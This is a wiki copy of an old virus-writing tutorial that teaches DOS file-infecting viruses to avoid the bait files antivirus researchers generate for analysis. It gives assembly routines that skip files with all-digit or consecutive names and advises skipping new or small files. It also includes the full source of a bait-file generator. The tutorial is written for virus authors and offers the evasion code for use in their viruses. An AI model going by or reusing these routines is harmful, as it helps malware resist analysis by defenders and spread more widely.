Please consider a donation to the Higher Intellect project. See https://preterhuman.net/donate.php or the Donate to Higher Intellect page for more info.

Anti-Bait Technique

From Higher Intellect Wiki
Jump to navigation Jump to search
                          Anti-Bait Technique
                          ~~~~~~~~~~~~~~~~~~~

                          -HATE-YOUR-ENEMIES-

        By using the methods  explained in the previous section,  we can
safely  say that the  AV can not  simply set the bait  maker to generate
10,000  bait files,  with the virus in memory,  and get an  accurate and
complete of what is necessary. Instead they must use many varying files,
reboot the system thousands of times to change the date, and fiddle with
the generation counter,  which will significantly slow things down.  But
let us take  things a step further:  let us imagine that the virus won't
even infect the  files in the first place.  This  would  simply  involve
putting  the candidate file  through a number of tests,  and if it fails
any of them,  saying the file  could be a bait,  and not infecting them.
This section simply looks at what some of these test could entail.


                   Anti-Bait Techniques: The Obvious
                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        The are two very obvious and easy test your virus _SHOULD_ have:

                1. It should not infect new files.
                2. It should not infect small files.

        New files should not be infected, as the files created by a bait
maker will usually look new.  Simply grab the current date,  and compare
it to the date stamp of the file. It is the same? Well then dont infect!
It should be noted that this is easilly defeated, if the bait maker sets
the files date stamp to a random date, before closing it.

        The files created by bait makers,  will usually be fairly small,
so small files should be avoided. I would recommend that you avoid files
smaller then between 5,000 and 10,000 bytes.  The smaller you make  this
limit,  the less chance  there is that a legitimate file will be wrongly
be left uninfected, but it is also more likely that a bad bait file will
wrongly be infected. By making the limit larger,  the greater the chance
there is that a legitimate file will be wrongly be left uninfected,  but
its also more likely that a bait file will correctly be left uninfected.
High limit or Low limit? The choice is yours... This  could  easilly  be
defeated if the bait maker created files which were, say,  50,000 bytes.
This size is obviously far to large to avoid, as it is larger then  many
legitimate programs.  You should also remember however that 10,240 files
at 5,000 bytes will use 52 megabytes,  so if the bait files were  50,000
bytes long, this figure would go upto 520 megabytes! Most test computers
do not have such lard hard drives, so it is safe to assume that the bait
files will be small.

        As the above two methods are so easy to implement,  I  will  not
bother to supply any example code.


                Anti-Bait Techniques: Avoid Digital File Names
                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        Most bait makers  create filenames like '00000000.com'  followed
by '00000001.com'. All the file are names composed of the characters '0'
to '9'.  We could have a check in our virus,  to ensure that this is not
true, and if it is, not infect the file, as shown below:
------------------------------------------------------------------------

;This code avoids file names composed entirely of digits. It is assumed
;that the file has already been opened, and that its file handle is in
;BX. get_sft_bx is assumed to be a sub-procedure that returns ES:DI pointing
;to the SFT entry of the handle in BX (the file to be infected).

        call    get_sft_bx
        mov     si,di
        add     si,20           ;File names in at offset 20h of SFT
        mov     cx,8            ;8 characters in name (padded with spaces)
        cld                     ;increment SI on LODSB

check_name:
        es:lodsb
        cmp     al,'0'
        jb      name_safe
        cmp     al,'9'
        ja      name_safe       ;character is not digit, so it is safe

        cmp     al,20           ;check for space if equal, end of name has
        je      not_safe        ;been reached, with only digits encounters.
                                ;which means it is possibly bait.

        loop    check_name      ;check next character

not_safe:
        jmp     exit_infect     ;end of name reached with only digits so
                                ;do not infect

name_safe:
        <DO NEXT BAIT CHECK or CONTINUE WITH INFECTION>
------------------------------------------------------------------------

        This method  could easilly be defeated by  using file names like
'AAAAAAAA.COM' instead of '00000000.com'.



          Anti-Bait Techniques: Avoid Consecutive File Names
          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        Many people consider this method overkill,  but it is  extremely
effective,  if you are serious about your Post-Discovery-Stratagies.  It
works by checking if the currents file to be infected, has a consecutive
file name of the previous filename. For example, if the previous file to
be infected was called 'AAAAAAAA.COM' you would not infect the next file
if it was called 'AAAAAAAB.COM'. The easiest way to do this, is save the
sum of the characters of the file name.  If the next file is consecutive
to it, the sum will be the sum of the previous one + 1. i.e:

        'AAAAAAAA' = 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A'
                   =  208h

        'AAAAAAAB' = 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'B'
                   =  209h

        Therefore, of the filename of your candidate file, and use it to
check if the  next file  to be infected is consecutive.  If it is do not
infect! Example:
------------------------------------------------------------------------

;This code avoids infecting files with consecutive filenames. It is assumed
;that the file has already been opened, and that its file handle is in
;BX. get_sft_bx is assumed to be a sub-procedure that returns ES:DI pointing
;to the SFT entry of the handle in BX (the file to be infected).

        call    get_sft_bx
        mov     si,di
        add     si,20           ;File names in at offset 20h of SFT
        mov     cx,8            ;8 characters in name (padded with spaces)
        cld                     ;increment SI on LODSB
        xor     bx,bx
        mov     ah,0

check_consecutive:
        es:lodsb
        cmp     al,20           ;check for space
        je      end_cc          ;if space, end of name rached
        add     bx,ax           ;add character to sum
        loop    check_consecutive

end_cc: mov     ax,cs:last_sum  ;the sum of the last filename
        mov     cs:last_sum,bx  ;save the sum of this file name for next time
        inc     ax
        cmp     ax,bx
        je      dont_infect

        <DO NEXT BAIT CHECK or CONTINUE WITH INFECTION>
------------------------------------------------------------------------

        The above code is fairly lengthy,  and messy, but it works!  You
should also not infect a file,  if it is the same length as the previous
file,  for obvious reasons.  This code could by defeated by incrementing
filename by values other then 1,  or even by incrementing it by a RANDOM
amount each time.

        To help you test your Anti-Bait code, I have put together a Bait
Generator (Sepultura's Funky Bait Maker), which can be modified to  show
how each of the above methods are defeated. Here is the complete source:
------------------------------------------------------------------------

;SFBM.ASM compile with A86
;This is a bait maker that in its original state, will fail to defeat all
;of the above mentioned techniques. However, by making the modifications
;described through out the code, all of the above techniques will fail
;miserably.

;By changing the Below EQUates, and (un)commenting certain code below, you
;can test the various technique described above, as well as any other Anti-
;Bait Technique you think off..

number_of_files equ     200             ;number of bait files to genrate

file_length     equ     5000            ;length of bait file. Change this to
                                        ;catchout virii that do not infect
                                        ;small files. (minimum 38, maximum
                                        ;65,279).

first_character equ     '0'             ;Changing these two equates to 'A' to
last_character  equ     '9'             ;'Z' will fool virii that check if
                                        ;the filename is entirely numbers..


character_range equ     (last_character - first_character)+1 ;This is used
                                                        ;to calculate the
                                                        ;filename..

        radix   16

        org     100

        mov     ds,cs
        mov     ah,9
        mov     dx,offset gen_msg       ;prints intro message..
        int     21

        mov     cx,number_of_files      ;200 bait files

file_loop:
        push    cx
        mov     dx,offset filename
        xor     cx,cx
        mov     ax,3c02                 ;CREATE/TRUNCATE "filename"
        int     21
        mov     bx,ax                   ;BX = Handle. I used a MOV, so
                                        ;AH stays = to 0

        mov     dx,offset bait
        mov     cx,file_length          ;file is 5000 bytes long

        ;Uncomment the IN, and ADD below, so the length of the bait becomes
        ;between FILE_LENGTH and (FILE_LENGTH + 255). This is to catchout
        ;virii that wont infect a file if its the same size as the last file.
        ;in     al,40
        ;add    cx,ax

        mov     ah,40                   ;Write Bait Program to file..
        int     21

        ;Uncommenting the below CALL, will cause SFBM to set each file
        ;to a random date, before closing, avoiding virii which dont
        ;infect new files.
        ;call    set_date

        pop     cx

        mov     ah,3e                   ;Closes the file..
        int     21

        push    ds
        mov     ax,4b00                 ;This calls a execute of "filename"
                                        ;i have set up no parameter tables,
                                        ;so it will not actually execute, but
                                        ;the virus will intercept and infect.
        mov     dx,offset filename
        int     21
        pop     ds

        mov     ah,9
        mov     dx,offset done          ;prints:
        int     21                      ;DONE: XXXXXXXX.COM

        std
        mov     si,offset units
        mov     di,si


next_character:
        mov     dl,1                    ;Add 1 to file name characters.
                                        ;(00000000 -> 00000001) etc..

        ;Uncommenting the code  below, will cause SFBM to add between
        ;2 and 5 to the file name characters. This will avoid virii that
        ;check for consecutive file names, as they are not incrementing by
        ;1 each time.
        ;cmp     si,offset units        ;Are we modifying a character other?
        ;jne     not_unit               ;If not, only add 1 to the character
        ;in     al,40
        ;and    al,3                    ;Choose amount between 2 and 5 to
        ;add    dl,al                   ;add..
        ;inc    dx

not_unit:
        lodsb
        add     al,dl                   ;Calculate Next File Name (increment)
        cmp     al,last_character + 1   ;Has it overflowed past
        jb      no_more_increase        ;last_character? If not continue..

        sub     al,character_range      ;else bring it back into range,
        ds:stosb
        jmp     short next_character    ;increment next char, and check for
                                        ;overflow...

no_more_increase:
        ds:stosb
        loop    file_loop       ;Do Next File (CX times)

        mov     ah,4c
        int     21

set_date:                       ;Sub Procedure gives file random Date & Time.
        in      ax,40           ;calculates the Year for Date stamp
        and     ax,0f
        xchg    dx,ax
        shl     dx,9

get_month:                      ;calculates the Month for Date stamp
        in      ax,40
        and     ax,0f
        cmp     ax,0c
        ja      get_month
        or      ax,ax
        jz      get_month
        shl     ax,5
        or      dx,ax

get_date:                       ;calculates the Day of Month for Date stamp
        in      ax,40
        and     ax,1f
        or      ax,ax
        jz      get_date
        or      dx,ax           ;DX = DATE

get_secs:                       ;calculates seconds of the Time Stamp
        in      ax,40
        and     ax,1f
        cmp     ax,1d
        ja      get_secs
        xchg    cx,ax

get_minuits:                    ;calculates minuits of the Time Stamp
        in      ax,40
        and     ax,3f
        cmp     ax,3b
        ja      get_minuits
        shl     ax,5
        or      cx,ax

get_hours:                      ;calculates hours of the Time Stamp
        in      ax,40
        and     ax,1f
        cmp     ax,17
        ja      get_hours
        shl     ax,0b
        or      cx,ax           ;CX = TIME

        mov     ax,5701         ;set DATE/TIME stamp
        int     21
        ret

gen_msg         db      "- Sepulturas Funky Bait Maker -",0a,0d
                db      "Generating Funky Bait Files...",0a,0d,"$"

done            db      "DONE: "
filename        db      7 dup (first_character)
units           db      first_character
                db      ".COM"
                db      0,0d
                db      "$"

;This is the .COM program that will be at the start of each Bait file.
;It is 38 bytes long. The rest of the file will just be padded with
;garbage from memory.

bait:   call    bait_b
        db      'Sepulturas Funky Bait File!$'
bait_b: pop     dx      ;DX = offset of bait message
        mov     ah,9
        int     21      ;print message
        int     20      ;exit

;END SFBM.ASM
------------------------------------------------------------------------

        The above Bait Maker can be very useful,  to test your Anti-Bait
techniques. It is also quite useful, for its orginal purpose - analysing
virii. Use it for either - AV - VX - they're all the same to me.